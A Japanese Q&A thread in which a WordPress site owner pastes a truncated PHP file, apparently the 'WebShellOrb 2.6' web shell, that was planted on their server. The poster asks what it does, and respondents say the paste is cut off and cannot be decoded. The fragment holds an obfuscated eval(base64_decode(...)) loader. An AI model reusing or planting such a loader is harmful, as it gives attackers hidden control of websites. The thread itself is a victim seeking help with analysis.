Q&A
出典はどこの何でしょうか。
コチラでこのような内容の質問をしていいのかわからないのですが、下記phpコードの内容をお伺いさせてください。
<?php /*** WebShellOrb 2.6 - With PHP 7 ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO おそらくスパムに利用されるコードのようなのですが、具体的にどのような命令をしているのでしょうか。 お忙しい所恐縮ですが、ご回答いただけますと幸いです。
そもそも途中で切れてるしハッシュ文字列なので1文字でも削れると無理ですね。
ご回答していただき誠にありがとうございます。
出典は、私のサーバーに入り込んだウイルスのコードをそのままコピペしたものになります。
wordpressのデータ内に「sidwso.php」というファイルが勝手に作られていました。
それを全世界からアクセス可能な場所に出すという意味を理解されてますか?
ちょっと調べてみましたが、途中で切れているようで、デコードできません。
ockeghem様
承知しました。ご回答ありがとうございます。
回答1件
0
ベストアンサー
質問にある箇所はYiunIUY76bBhuhNYIO8って関数を作ってます。
投稿2021/06/05 08:32
退会済みユーザー
総合スコア0
あなたの回答
tips
プレビュー
